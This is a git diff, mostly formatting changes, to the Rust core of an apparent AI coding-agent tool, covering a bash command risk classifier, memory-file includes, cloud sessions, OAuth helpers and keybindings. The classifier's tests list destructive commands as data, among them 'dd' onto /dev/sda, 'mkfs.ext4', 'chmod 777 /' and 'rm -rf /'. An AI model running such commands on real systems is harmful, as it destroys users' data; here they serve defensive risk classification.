+        "hostname",
+        "which",
+        "whereis",
+        "type",
+        "du",
+        "df",
+        "free",
+        "uptime",
+        "top",
+        "htop",
+        "ps",
+        "lsof",
+        "strace",
+        "ltrace",
+        "diff",
+        "patch",
         "openssl",
-        "base64", "xxd", "od",
-        "sleep", "wait",
-        "true", "false", "exit",
-        "test", "[", "[[",
+        "base64",
+        "xxd",
+        "od",
+        "sleep",
+        "wait",
+        "true",
+        "false",
+        "exit",
+        "test",
+        "[",
+        "[[",
         "read",
-        "bc", "expr",
-        "tput", "clear", "reset",
+        "bc",
+        "expr",
+        "tput",
+        "clear",
+        "reset",
     ];
 
     for lc in &low_cmds {
@@ -317,9 +417,22 @@ pub fn classify_bash_command(command: &str) -> BashRiskLevel {
             // push, rm, reset --hard, etc.) are Low.
             if bin == "git" {
                 let git_safe = [
-                    "status", "log", "diff", "show", "branch", "remote",
-                    "fetch", "ls-files", "ls-tree", "cat-file", "rev-parse",
-                    "describe", "shortlog", "tag", "stash list", "config --list",
+                    "status",
+                    "log",
+                    "diff",
+                    "show",
+                    "branch",
+                    "remote",
+                    "fetch",
+                    "ls-files",
+                    "ls-tree",
+                    "cat-file",
+                    "rev-parse",
+                    "describe",
+                    "shortlog",
+                    "tag",
+                    "stash list",
+                    "config --list",
                     "config --get",
                 ];
                 for gs in &git_safe {
@@ -335,25 +448,68 @@ pub fn classify_bash_command(command: &str) -> BashRiskLevel {
     // ── Safe: read-only ops ─────────────────────────────────────────────────
 
     let safe_cmds = [
-        "ls", "ll", "la", "dir",
-        "cat", "bat", "less", "more",
-        "grep", "rg", "ag", "ack",
-        "find", "locate", "fd",
-        "echo", "printf",
-        "pwd", "whoami", "id", "groups",
-        "uname", "hostname", "uptime",
-        "date", "cal",
-        "file", "stat",
-        "which", "whereis", "type", "command",
-        "env", "printenv",
-        "ps", "pgrep",
-        "df", "du", "free",
-        "lsblk", "lscpu", "lspci", "lsusb",
-        "ifconfig", "ip", "ss", "netstat",
-        "ping", "traceroute", "nslookup", "dig", "host",
-        "wc", "head", "tail",
-        "md5sum", "sha1sum", "sha256sum",
-        "strings", "objdump", "nm", "readelf",
+        "ls",
+        "ll",
+        "la",
+        "dir",
+        "cat",
+        "bat",
+        "less",
+        "more",
+        "grep",
+        "rg",
+        "ag",
+        "ack",
+        "find",
+        "locate",
+        "fd",
+        "echo",
+        "printf",
+        "pwd",
+        "whoami",
+        "id",
+        "groups",
+        "uname",
+        "hostname",
+        "uptime",
+        "date",
+        "cal",
+        "file",
+        "stat",
+        "which",
+        "whereis",
+        "type",
+        "command",
+        "env",
+        "printenv",
+        "ps",
+        "pgrep",
+        "df",
+        "du",
+        "free",
+        "lsblk",
+        "lscpu",
+        "lspci",
+        "lsusb",
+        "ifconfig",
+        "ip",
+        "ss",
+        "netstat",
+        "ping",
+        "traceroute",
+        "nslookup",
+        "dig",
+        "host",
+        "wc",
+        "head",
+        "tail",
+        "md5sum",
+        "sha1sum",
+        "sha256sum",
+        "strings",
+        "objdump",
+        "nm",
+        "readelf",
         "tree",
     ];
     for sc in &safe_cmds {
@@ -394,33 +550,63 @@ mod tests {
     fn test_safe_commands() {
         assert_eq!(classify_bash_command("ls -la"), BashRiskLevel::Safe);
         assert_eq!(classify_bash_command("cat /etc/hosts"), BashRiskLevel::Safe);
-        assert_eq!(classify_bash_command("grep foo bar.txt"), BashRiskLevel::Safe);
+        assert_eq!(
+            classify_bash_command("grep foo bar.txt"),
+            BashRiskLevel::Safe
+        );
         assert_eq!(classify_bash_command("echo hello"), BashRiskLevel::Safe);
-        assert_eq!(classify_bash_command("find . -name '*.rs'"), BashRiskLevel::Safe);
+        assert_eq!(
+            classify_bash_command("find . -name '*.rs'"),
+            BashRiskLevel::Safe
+        );
         assert_eq!(classify_bash_command("git status"), BashRiskLevel::Safe);
-        assert_eq!(classify_bash_command("git log --oneline"), BashRiskLevel::Safe);
+        assert_eq!(
+            classify_bash_command("git log --oneline"),
+            BashRiskLevel::Safe
+        );
     }
 
     #[test]
     fn test_low_commands() {
-        assert_eq!(classify_bash_command("git commit -m 'fix'"), BashRiskLevel::Low);
+        assert_eq!(
+            classify_bash_command("git commit -m 'fix'"),
+            BashRiskLevel::Low
+        );
         assert_eq!(classify_bash_command("cargo build"), BashRiskLevel::Low);
         assert_eq!(classify_bash_command("npm install"), BashRiskLevel::Low);
-        assert_eq!(classify_bash_command("pip install requests"), BashRiskLevel::Low);
+        assert_eq!(
+            classify_bash_command("pip install requests"),
+            BashRiskLevel::Low
+        );
     }
 
     #[test]
     fn test_medium_commands() {
-        assert_eq!(classify_bash_command("rm -r ./build"), BashRiskLevel::Medium);
+        assert_eq!(
+            classify_bash_command("rm -r ./build"),
+            BashRiskLevel::Medium
+        );
         assert_eq!(classify_bash_command("kill -9 1234"), BashRiskLevel::Medium);
-        assert_eq!(classify_bash_command("chmod 644 file.txt"), BashRiskLevel::Medium);
-        assert_eq!(classify_bash_command("apt-get install vim"), BashRiskLevel::Medium);
+        assert_eq!(
+            classify_bash_command("chmod 644 file.txt"),
+            BashRiskLevel::Medium
+        );
+        assert_eq!(
+            classify_bash_command("apt-get install vim"),
+            BashRiskLevel::Medium
+        );
     }
 
     #[test]
     fn test_high_commands() {
-        assert_eq!(classify_bash_command("sudo apt-get upgrade"), BashRiskLevel::High);
-        assert_eq!(classify_bash_command("curl https://example.com/script.sh"), BashRiskLevel::High);
+        assert_eq!(
+            classify_bash_command("sudo apt-get upgrade"),
+            BashRiskLevel::High
+        );
+        assert_eq!(
+            classify_bash_command("curl https://example.com/script.sh"),
+            BashRiskLevel::High
+        );
         assert_eq!(classify_bash_command("su -c 'whoami'"), BashRiskLevel::High);
     }
 
@@ -431,7 +617,10 @@ mod tests {
             classify_bash_command("dd if=/dev/zero of=/dev/sda"),
             BashRiskLevel::Critical
         );
-        assert_eq!(classify_bash_command("mkfs.ext4 /dev/sda1"), BashRiskLevel::Critical);
+        assert_eq!(
+            classify_bash_command("mkfs.ext4 /dev/sda1"),
+            BashRiskLevel::Critical
+        );
         assert_eq!(
             classify_bash_command("chmod 777 /"),
             BashRiskLevel::Critical
@@ -461,15 +650,27 @@ mod tests {
 
     #[test]
     fn test_auto_approvable_bypass() {
-        assert!(is_auto_approvable("rm -rf /", &PermissionMode::BypassPermissions));
+        assert!(is_auto_approvable(
+            "rm -rf /",
+            &PermissionMode::BypassPermissions
+        ));
     }
 
     #[test]
     fn test_auto_approvable_accept_edits() {
         assert!(is_auto_approvable("ls -la", &PermissionMode::AcceptEdits));
-        assert!(is_auto_approvable("cargo build", &PermissionMode::AcceptEdits));
-        assert!(!is_auto_approvable("rm -r ./build", &PermissionMode::AcceptEdits));
-        assert!(!is_auto_approvable("sudo make install", &PermissionMode::AcceptEdits));
+        assert!(is_auto_approvable(
+            "cargo build",
+            &PermissionMode::AcceptEdits
+        ));
+        assert!(!is_auto_approvable(
+            "rm -r ./build",
+            &PermissionMode::AcceptEdits
+        ));
+        assert!(!is_auto_approvable(
+            "sudo make install",
+            &PermissionMode::AcceptEdits
+        ));
     }
 
     #[test]

--- a/src-rust/crates/core/src/claudemd.rs
+++ b/src-rust/crates/core/src/claudemd.rs
@@ -63,7 +63,11 @@ impl MemoryCache {
     pub fn get(&self, path: &Path) -> Option<&str> {
         let mtime = std::fs::metadata(path).ok()?.modified().ok()?;
         let (cached_mtime, content) = self.entries.get(path)?;
-        if *cached_mtime == mtime { Some(content.as_str()) } else { None }
+        if *cached_mtime == mtime {
+            Some(content.as_str())
+        } else {
+            None
+        }
     }
 
     /// Store file content with its current mtime.
@@ -133,9 +137,7 @@ pub fn expand_includes(
             let path_str = path_str.trim();
             // Resolve relative to base_dir; expand ~ to home dir.
             let include_path = if path_str.starts_with('~') {
-                dirs::home_dir()
-                    .unwrap_or_default()
-                    .join(&path_str[2..])
+                dirs::home_dir().unwrap_or_default().join(&path_str[2..])
             } else if Path::new(path_str).is_absolute() {
                 PathBuf::from(path_str)
             } else {
@@ -144,13 +146,19 @@ pub fn expand_includes(
 
             let canonical = include_path.canonicalize().unwrap_or(include_path.clone());
             if visited.contains(&canonical) {
-                result.push_str(&format!("<!-- circular @include {} skipped -->\n", path_str));
+                result.push_str(&format!(
+                    "<!-- circular @include {} skipped -->\n",
+                    path_str
+                ));
                 continue;
             }
             if let Ok(included) = std::fs::read_to_string(&include_path) {
                 // Check max size.
                 if included.len() > 40 * 1024 {
-                    result.push_str(&format!("<!-- @include {} exceeds 40KB limit -->\n", path_str));
+                    result.push_str(&format!(
+                        "<!-- @include {} exceeds 40KB limit -->\n",
+                        path_str
+                    ));
                     continue;
                 }
                 visited.insert(canonical);
@@ -192,7 +200,12 @@ pub fn load_memory_file(path: &Path, scope: MemoryScope) -> Option<MemoryFileInf
     let (frontmatter, body) = parse_frontmatter(&raw);
     let mut visited = HashSet::new();
     visited.insert(path.canonicalize().unwrap_or(path.to_path_buf()));
-    let content = expand_includes(body, path.parent().unwrap_or(Path::new(".")), &mut visited, 0);
+    let content = expand_includes(
+        body,
+        path.parent().unwrap_or(Path::new(".")),
+        &mut visited,
+        0,
+    );
 
     Some(MemoryFileInfo {
         path: path.to_path_buf(),
@@ -217,7 +230,11 @@ pub fn load_all_memory_files(project_root: &Path) -> Vec<MemoryFileInfo> {
                 .flatten()
                 .filter_map(|e| {
                     let p = e.path();
-                    if p.extension().map_or(false, |x| x == "md") { Some(p) } else { None }
+                    if p.extension().map_or(false, |x| x == "md") {
+                        Some(p)
+                    } else {
+                        None
+                    }
                 })
                 .collect();
             paths.sort();
@@ -294,7 +311,12 @@ mod tests {
         let b = tmp.path().join("b.md");
         std::fs::write(&a, "@include b.md\n").unwrap();
         std::fs::write(&b, "@include a.md\ncontent\n").unwrap();
-        let result = expand_includes("@include a.md\n", tmp.path(), &mut std::collections::HashSet::new(), 0);
+        let result = expand_includes(
+            "@include a.md\n",
+            tmp.path(),
+            &mut std::collections::HashSet::new(),
+            0,
+        );
         // Should not infinite-loop; circular reference comment present.
         assert!(result.contains("circular") || result.contains("content"));
     }

--- a/src-rust/crates/core/src/cloud_session.rs
+++ b/src-rust/crates/core/src/cloud_session.rs
@@ -3,9 +3,9 @@
 //! Converts between internal Message types and the cloud API format.
 //! Provides CRUD operations for cloud-hosted sessions.
 
+use crate::types::{ContentBlock, Message, MessageContent, Role};
 use serde::{Deserialize, Serialize};
 use serde_json::Value;
-use crate::types::{Message, Role, MessageContent, ContentBlock};
 
 // ---------------------------------------------------------------------------
 // Cloud session API types
@@ -37,7 +37,7 @@ pub struct CloudSessionDetail {
 #[derive(Debug, Clone, Serialize, Deserialize)]
 pub struct CloudMessage {
     pub id: String,
-    pub role: String,    // "user" | "assistant"
+    pub role: String,        // "user" | "assistant"
     pub content: Vec<Value>, // Array of Anthropic-schema content block objects
     pub created_at: u64,
     pub session_id: String,
@@ -70,10 +70,7 @@ pub fn message_to_cloud(msg: &Message, session_id: &str, msg_id: &str, ts: u64) 
 
     let content: Vec<Value> = content_to_blocks(&msg.content)
         .into_iter()
-        .map(|block| {
-            serde_json::to_value(&block)
-                .unwrap_or_else(|_| Value::Null)
-        })
+        .map(|block| serde_json::to_value(&block).unwrap_or_else(|_| Value::Null))
         .collect();
 
     CloudMessage {
@@ -91,7 +88,11 @@ pub fn message_to_cloud(msg: &Message, session_id: &str, msg_id: &str, ts: u64) 
 /// that cannot be parsed are silently skipped so that unknown future block
 /// types do not crash older clients.
 pub fn cloud_to_message(cloud: &CloudMessage) -> Message {
-    let role = if cloud.role == "assistant" { Role::Assistant } else { Role::User };
+    let role = if cloud.role == "assistant" {
+        Role::Assistant
+    } else {
+        Role::User
+    };
 
     let blocks: Vec<ContentBlock> = cloud
         .content
@@ -140,20 +141,24 @@ impl CloudSessionClient {
 
     /// List all cloud sessions.
     pub async fn list(&self) -> Result<Vec<crate::remote_session::CloudSession>, String> {
-        let resp = self.http
+        let resp = self
+            .http
             .get(format!("{}/api/sessions", self.base_url))
             .header("Authorization", format!("Bearer {}", self.access_token))
-            .send().await
+            .send()
+            .await
             .map_err(|e| e.to_string())?;
         resp.json().await.map_err(|e| e.to_string())
     }
 
     /// Fetch full session details including messages.
     pub async fn fetch(&self, session_id: &str) -> Result<CloudSessionDetail, String> {
-        let resp = self.http
+        let resp = self
+            .http
             .get(format!("{}/api/sessions/{}", self.base_url, session_id))
             .header("Authorization", format!("Bearer {}", self.access_token))
-            .send().await
+            .send()
+            .await
             .map_err(|e| e.to_string())?;
         resp.json().await.map_err(|e| e.to_string())
     }
@@ -164,11 +169,16 @@ impl CloudSessionClient {
         session_id: &str,
         messages: &[CloudMessage],
     ) -> Result<(), String> {
-        let resp = self.http
-            .post(format!("{}/api/sessions/{}/messages", self.base_url, session_id))
+        let resp = self
+            .http
+            .post(format!(
+                "{}/api/sessions/{}/messages",
+                self.base_url, session_id
+            ))
             .header("Authorization", format!("Bearer {}", self.access_token))
             .json(messages)
-            .send().await
+            .send()
+            .await
             .map_err(|e| e.to_string())?;
         if !resp.status().is_success() {
             return Err(format!("HTTP {}", resp.status()));
@@ -177,22 +187,29 @@ impl CloudSessionClient {
     }
 
     /// Create a new cloud session.
-    pub async fn create(&self, opts: CloudSessionCreateOpts) -> Result<crate::remote_session::CloudSession, String> {
-        let resp = self.http
+    pub async fn create(
+        &self,
+        opts: CloudSessionCreateOpts,
+    ) -> Result<crate::remote_session::CloudSession, String> {
+        let resp = self
+            .http
             .post(format!("{}/api/sessions", self.base_url))
             .header("Authorization", format!("Bearer {}", self.access_token))
             .json(&opts)
-            .send().await
+            .send()
+            .await
             .map_err(|e| e.to_string())?;
         resp.json().await.map_err(|e| e.to_string())
     }
 
     /// Delete a cloud session.
     pub async fn delete(&self, session_id: &str) -> Result<(), String> {
-        let resp = self.http
+        let resp = self
+            .http
             .delete(format!("{}/api/sessions/{}", self.base_url, session_id))
             .header("Authorization", format!("Bearer {}", self.access_token))
-            .send().await
+            .send()
+            .await
             .map_err(|e| e.to_string())?;
         if !resp.status().is_success() {
             return Err(format!("HTTP {}", resp.status()));

--- a/src-rust/crates/core/src/codex_oauth.rs
+++ b/src-rust/crates/core/src/codex_oauth.rs
@@ -1,6 +1,9 @@
 //! OpenAI Codex OAuth configuration and constants.
 //!
 
+use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _};
+use serde_json::Value;
+
 /// OpenAI Codex OAuth client ID (shared with the OpenCode ecosystem).
 pub const CODEX_CLIENT_ID: &str = "app_EMoamEEZ73f0CkXaXp7hrann";
 
@@ -38,6 +41,34 @@ pub const CODEX_MODELS: &[(&str, &str)] = &[
 /// Default Codex model to use
 pub const DEFAULT_CODEX_MODEL: &str = "gpt-5.2-codex";
 
+pub fn extract_account_id_from_jwt(token: &str) -> Option<String> {
+    let payload_b64 = token.split('.').nth(1)?;
+    let payload = URL_SAFE_NO_PAD.decode(payload_b64).ok()?;
+    let json: Value = serde_json::from_slice(&payload).ok()?;
+
+    json["chatgpt_account_id"]
+        .as_str()
+        .or_else(|| json["https://api.openai.com/auth"]["chatgpt_account_id"].as_str())
+        .or_else(|| json["https://api.openai.com/auth"]["account_id"].as_str())
+        .or_else(|| {
+            json["organizations"]
+                .as_array()
+                .and_then(|orgs| orgs.first())
+                .and_then(|org| org["id"].as_str())
+        })
+        .map(|s| s.to_string())
+}
+
+pub fn expires_at_from_now(expires_in_secs: Option<u64>) -> Option<u64> {
+    expires_in_secs.map(|secs| {
+        std::time::SystemTime::now()
+            .duration_since(std::time::UNIX_EPOCH)
+            .unwrap_or_default()
+            .as_secs()
+            .saturating_add(secs)
+    })
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -67,5 +98,35 @@ mod tests {
     #[test]
     fn test_redirect_uri_is_localhost() {
         assert!(CODEX_REDIRECT_URI.contains("localhost:1455"));
+    }
+
+    #[test]
+    fn test_extract_account_id_from_auth_claims() {
+        let payload = r#"{"https://api.openai.com/auth":{"chatgpt_account_id":"acct_123"}}"#;
+        let token = format!("a.{}.c", URL_SAFE_NO_PAD.encode(payload.as_bytes()));
+        assert_eq!(
+            extract_account_id_from_jwt(&token).as_deref(),
+            Some("acct_123")
+        );
+    }
+
+    #[test]
+    fn test_extract_account_id_from_organizations() {
+        let payload = r#"{"organizations":[{"id":"org_123"}]}"#;
+        let token = format!("a.{}.c", URL_SAFE_NO_PAD.encode(payload.as_bytes()));
+        assert_eq!(
+            extract_account_id_from_jwt(&token).as_deref(),
+            Some("org_123")
+        );
+    }
+
+    #[test]
+    fn test_expires_at_from_now_sets_future_time() {
+        let now = std::time::SystemTime::now()
+            .duration_since(std::time::UNIX_EPOCH)
+            .unwrap_or_default()
+            .as_secs();
+        let expires_at = expires_at_from_now(Some(3600)).unwrap();
+        assert!(expires_at >= now + 3599);
     }
 }

--- a/src-rust/crates/core/src/crypto_utils.rs
+++ b/src-rust/crates/core/src/crypto_utils.rs
@@ -3,7 +3,7 @@
 //! Provides SHA-256 hashing, UUID generation, base64url encoding,
 //! and work secret generation.
 
-use base64::{Engine, engine::general_purpose::URL_SAFE_NO_PAD};
+use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine};
 use sha2::{Digest, Sha256};
 use std::time::{SystemTime, UNIX_EPOCH};
 

--- a/src-rust/crates/core/src/effort.rs
+++ b/src-rust/crates/core/src/effort.rs
@@ -136,7 +136,12 @@ mod tests {
             EffortLevel::Max,
         ] {
             let parsed = EffortLevel::from_str(level.as_str());
-            assert_eq!(parsed, Some(level), "from_str({:?}) should round-trip", level);
+            assert_eq!(
+                parsed,
+                Some(level),
+                "from_str({:?}) should round-trip",
+                level
+            );
         }
     }
 

--- a/src-rust/crates/core/src/feature_gates.rs
+++ b/src-rust/crates/core/src/feature_gates.rs
@@ -107,7 +107,10 @@ pub fn is_env_truthy(val: Option<&str>) -> bool {
 pub fn is_env_defined_falsy(val: Option<&str>) -> bool {
     match val {
         Some(v) => {
-            matches!(v.to_ascii_lowercase().as_str(), "0" | "false" | "no" | "off")
+            matches!(
+                v.to_ascii_lowercase().as_str(),
+                "0" | "false" | "no" | "off"
+            )
         }
         None => false,
     }

--- a/src-rust/crates/core/src/format_utils.rs
+++ b/src-rust/crates/core/src/format_utils.rs
@@ -45,7 +45,11 @@ pub fn format_tokens(count: u64) -> String {
 /// Format a token/cost summary line for the status bar.
 /// Example: "3.2K tokens · $0.04"
 pub fn format_usage_summary(tokens: u64, cost_cents: f64) -> String {
-    format!("{} tokens · {}", format_tokens(tokens), format_cost_usd(cost_cents))
+    format!(
+        "{} tokens · {}",
+        format_tokens(tokens),
+        format_cost_usd(cost_cents)
+    )
 }
 
 /// Format a relative time string (for session listings).

--- a/src-rust/crates/core/src/git_utils.rs
+++ b/src-rust/crates/core/src/git_utils.rs
@@ -42,7 +42,11 @@ fn git_output(repo_root: &Path, args: &[&str]) -> String {
 /// Return the current branch name (or "HEAD" if detached).
 pub fn get_current_branch(repo_root: &Path) -> String {
     let branch = git_output(repo_root, &["rev-parse", "--abbrev-ref", "HEAD"]);
-    if branch.is_empty() { "HEAD".to_string() } else { branch }
+    if branch.is_empty() {
+        "HEAD".to_string()
+    } else {
+        branch
+    }
 }
 
 /// Return list of files modified (staged or unstaged).
@@ -93,12 +97,15 @@ pub struct CommitInfo {
 pub fn get_commit_history(repo_root: &Path, n: usize) -> Vec<CommitInfo> {
     let format = "%H%x1f%h%x1f%an%x1f%ad%x1f%s%x1e";
     let n_str = n.to_string();
-    let output = git_output(repo_root, &[
-        "log",
-        &format!("-{}", n_str),
-        &format!("--format={}", format),
-        "--date=short",
-    ]);
+    let output = git_output(
+        repo_root,
+        &[
+            "log",
+            &format!("-{}", n_str),
+            &format!("--format={}", format),
+            "--date=short",
+        ],
+    );
 
     output
         .split('\x1e')

--- a/src-rust/crates/core/src/keybindings.rs
+++ b/src-rust/crates/core/src/keybindings.rs
@@ -144,7 +144,6 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("ctrl+r", "historySearch", KeyContext::Global),
         ("ctrl+b", "createBranch", KeyContext::Global),
         ("alt+h", "openHelp", KeyContext::Global),
-
         // ========== CHAT / INPUT CONTEXT ==========
         ("enter", "submit", KeyContext::Chat),
         ("up", "historyPrev", KeyContext::Chat),
@@ -156,7 +155,6 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("shift+enter", "newline", KeyContext::Chat),
         ("home", "goLineStart", KeyContext::Chat),
         ("end", "goLineEnd", KeyContext::Chat),
-
         // Text Editing (Emacs-style) + app shortcuts
         ("ctrl+a", "openModelPicker", KeyContext::Chat),
         ("ctrl+e", "goLineEnd", KeyContext::Chat),
@@ -166,7 +164,6 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("ctrl+w", "killWord", KeyContext::Chat),
         ("alt+d", "deleteWord", KeyContext::Chat),
         ("alt+backspace", "killWord", KeyContext::Chat),
-
         // New Text Editing & Navigation
         ("ctrl+m", "sendMessage", KeyContext::Chat),
         ("ctrl+l", "clearLine", KeyContext::Chat),
@@ -176,7 +173,6 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("alt+right", "nextMessage", KeyContext::Chat),
         ("ctrl+o", "historyPrev", KeyContext::Chat),
         ("ctrl+i", "historyNext", KeyContext::Chat),
-
         // Searching
         ("ctrl+f", "findInMessage", KeyContext::Chat),
         ("ctrl+shift+f", "globalSearch", KeyContext::Chat),
@@ -185,7 +181,6 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("ctrl+]", "findNext", KeyContext::Chat),
         ("shift+f3", "findPrev", KeyContext::Chat),
         ("ctrl+[", "findPrev", KeyContext::Chat),
-
         // ========== CONFIRMATION DIALOGS ==========
         ("y", "yes", KeyContext::Confirmation),
         ("enter", "yes", KeyContext::Confirmation),
@@ -193,7 +188,6 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("escape", "no", KeyContext::Confirmation),
         ("up", "prevOption", KeyContext::Confirmation),
         ("down", "nextOption", KeyContext::Confirmation),
-
         // ========== HELP OVERLAY ==========
         ("escape", "close", KeyContext::Help),
         ("q", "close", KeyContext::Help),
@@ -201,14 +195,12 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("down", "scrollDown", KeyContext::Help),
         ("pageup", "pageUp", KeyContext::Help),
         ("pagedown", "pageDown", KeyContext::Help),
-
         // ========== HISTORY SEARCH ==========
         ("enter", "select", KeyContext::HistorySearch),
         ("escape", "cancel", KeyContext::HistorySearch),
         ("up", "prevResult", KeyContext::HistorySearch),
         ("down", "nextResult", KeyContext::HistorySearch),
         ("tab", "togglePreview", KeyContext::HistorySearch),
-
         // ========== TRANSCRIPT / MESSAGE SELECTION ==========
         ("up", "prevMessage", KeyContext::Transcript),
         ("down", "nextMessage", KeyContext::Transcript),
@@ -218,7 +210,6 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("end", "goEnd", KeyContext::Transcript),
         ("enter", "selectMessage", KeyContext::Transcript),
         ("escape", "cancel", KeyContext::Transcript),
-
         // ========== MESSAGE SELECTOR OVERLAY ==========
         ("up", "prevMessage", KeyContext::MessageSelector),
         ("down", "nextMessage", KeyContext::MessageSelector),
@@ -226,7 +217,6 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("escape", "cancel", KeyContext::MessageSelector),
         ("j", "nextMessage", KeyContext::MessageSelector),
         ("k", "prevMessage", KeyContext::MessageSelector),
-
         // ========== THEME & MODEL PICKERS ==========
         ("up", "prev", KeyContext::ThemePicker),
         ("down", "next", KeyContext::ThemePicker),
@@ -236,14 +226,12 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("escape", "cancel", KeyContext::ThemePicker),
         ("j", "next", KeyContext::ThemePicker),
         ("k", "prev", KeyContext::ThemePicker),
-
         // ========== TASK LIST ==========
         ("up", "prevTask", KeyContext::Task),
         ("down", "nextTask", KeyContext::Task),
         ("enter", "selectTask", KeyContext::Task),
         ("escape", "closeTask", KeyContext::Task),
         ("x", "toggleDone", KeyContext::Task),
-
         // ========== DIFF DIALOG ==========
         ("up", "prevDiff", KeyContext::DiffDialog),
         ("down", "nextDiff", KeyContext::DiffDialog),
@@ -253,7 +241,6 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("escape", "rejectDiff", KeyContext::DiffDialog),
         ("r", "rejectDiff", KeyContext::DiffDialog),
         ("a", "acceptDiff", KeyContext::DiffDialog),
-
         // ========== MODAL SELECT (Generic) ==========
         ("up", "prev", KeyContext::Select),
         ("down", "next", KeyContext::Select),
@@ -264,7 +251,6 @@ pub fn default_bindings() -> Vec<ParsedBinding> {
         ("j", "next", KeyContext::Select),
         ("k", "prev", KeyContext::Select),
         ("/", "search", KeyContext::Select),
-
         // ========== PLUGIN & ATTACHMENTS ==========
         ("up", "prev", KeyContext::Plugin),
         ("down", "next", KeyContext::Plugin),
@@ -342,11 +328,14 @@ impl UserKeybindings {
             .into_iter()
             .flat_map(|block| {
                 let context = block.context;
-                block.bindings.into_iter().map(move |(chord, action)| UserBinding {
-                    chord,
-                    action,
-                    context: Some(context.clone()),
-                })
+                block
+                    .bindings
+                    .into_iter()
+                    .map(move |(chord, action)| UserBinding {
+                        chord,
+                        action,
+                        context: Some(context.clone()),
+                    })
             })
             .collect();
         Ok(Self { bindings })
@@ -562,7 +551,10 @@ mod tests {
                 && b.context == KeyContext::Chat
         });
 
-        assert_eq!(ctrl_a.and_then(|b| b.action.as_deref()), Some("openModelPicker"));
+        assert_eq!(
+            ctrl_a.and_then(|b| b.action.as_deref()),
+            Some("openModelPicker")
+        );
         assert_eq!(
             ctrl_k.and_then(|b| b.action.as_deref()),
             Some("openCommandPalette")
@@ -633,7 +625,10 @@ mod tests {
         assert_eq!(user.bindings.len(), 2);
         assert_eq!(user.bindings[0].context.as_deref(), Some("Chat"));
         assert_eq!(user.bindings[0].chord, "ctrl+g");
-        assert_eq!(user.bindings[0].action.as_deref(), Some("chat:externalEditor"));
+        assert_eq!(
+            user.bindings[0].action.as_deref(),
+            Some("chat:externalEditor")
+        );
         assert_eq!(user.bindings[1].chord, "space");
         assert_eq!(user.bindings[1].action, None);
     }
@@ -644,21 +639,45 @@ mod tests {
         let bindings = default_bindings();
 
         // Build list of keybinding actions
-        let actions: Vec<String> = bindings
-            .iter()
-            .filter_map(|b| b.action.clone())
-            .collect();
+        let actions: Vec<String> = bindings.iter().filter_map(|b| b.action.clone()).collect();
 
         // Check Phase 1 keybinding actions exist
-        assert!(actions.contains(&"clearLine".to_string()), "clearLine action not found");
-        assert!(actions.contains(&"sendMessage".to_string()), "sendMessage action not found");
-        assert!(actions.contains(&"jumpToNextError".to_string()), "jumpToNextError action not found");
-        assert!(actions.contains(&"jumpToPreviousError".to_string()), "jumpToPreviousError action not found");
-        assert!(actions.contains(&"previousMessage".to_string()), "previousMessage action not found");
-        assert!(actions.contains(&"nextMessage".to_string()), "nextMessage action not found");
-        assert!(actions.contains(&"openHelp".to_string()), "openHelp action not found");
-        assert!(actions.contains(&"deleteCharBefore".to_string()), "deleteCharBefore action not found");
-        assert!(actions.contains(&"reverseIndent".to_string()), "reverseIndent action not found");
+        assert!(
+            actions.contains(&"clearLine".to_string()),
+            "clearLine action not found"
+        );
+        assert!(
+            actions.contains(&"sendMessage".to_string()),
+            "sendMessage action not found"
+        );
+        assert!(
+            actions.contains(&"jumpToNextError".to_string()),
+            "jumpToNextError action not found"
+        );
+        assert!(
+            actions.contains(&"jumpToPreviousError".to_string()),
+            "jumpToPreviousError action not found"
+        );
+        assert!(
+            actions.contains(&"previousMessage".to_string()),
+            "previousMessage action not found"
+        );
+        assert!(
+            actions.contains(&"nextMessage".to_string()),
+            "nextMessage action not found"
+        );
+        assert!(
+            actions.contains(&"openHelp".to_string()),
+            "openHelp action not found"
+        );
+        assert!(
+            actions.contains(&"deleteCharBefore".to_string()),
+            "deleteCharBefore action not found"
+        );
+        assert!(
+            actions.contains(&"reverseIndent".to_string()),
+            "reverseIndent action not found"
+        );
 
         // Verify we have at least 10 new keybindings (Phase 1 requirement)
         assert!(

--- a/src-rust/crates/core/src/lib.rs
+++ b/src-rust/crates/core/src/lib.rs
@@ -5,18 +5,18 @@
 
 // Branded provider / model identifier newtypes.
 pub mod provider_id;
-pub use provider_id::{ProviderId, ModelId};
+pub use provider_id::{ModelId, ProviderId};
 
 // Session transcript persistence (JSONL, matches TS sessionStorage.ts schema).
 pub mod session_storage;
 
 // Session sharing — HTTP upload to a share endpoint + local text export.
 pub mod session_share;
-pub use session_share::{share_session, export_session_text};
+pub use session_share::{export_session_text, share_session};
 
 // SQLite-backed session storage (faster alternative to JSONL).
 pub mod sqlite_storage;
-pub use sqlite_storage::{SqliteSessionStore, SessionSummary};
+pub use sqlite_storage::{SessionSummary, SqliteSessionStore};
 
 // Attachment pipeline — assembles per-turn context attachments (T1-6).
 pub mod attachments;
@@ -32,16 +32,16 @@ pub use auth_store::{AuthStore, StoredCredential};
 pub mod device_code;
 
 // Utility modules ported from src/utils/
+pub mod auto_mode;
+pub mod crypto_utils;
+pub mod format_utils;
+pub mod status_notices;
 pub mod token_budget;
 pub mod truncate;
-pub mod format_utils;
-pub mod crypto_utils;
-pub mod status_notices;
-pub mod auto_mode;
 
 // Remote session sync and cloud session API (T3-1, T3-2).
-pub mod remote_session;
 pub mod cloud_session;
+pub mod remote_session;
 
 // AGENTS.md hierarchical memory loading (T4-1).
 pub mod claudemd;
@@ -63,35 +63,37 @@ pub mod mcp_templates;
 
 // IDE environment detection (VS Code, Cursor, JetBrains, …).
 pub mod ide;
-pub use ide::{IdeKind, detect_ide};
+pub use ide::{detect_ide, IdeKind};
 
 // Background update checker — compares running version against GitHub releases.
 pub mod update_check;
 pub use update_check::{check_for_updates, UpdateInfo};
 
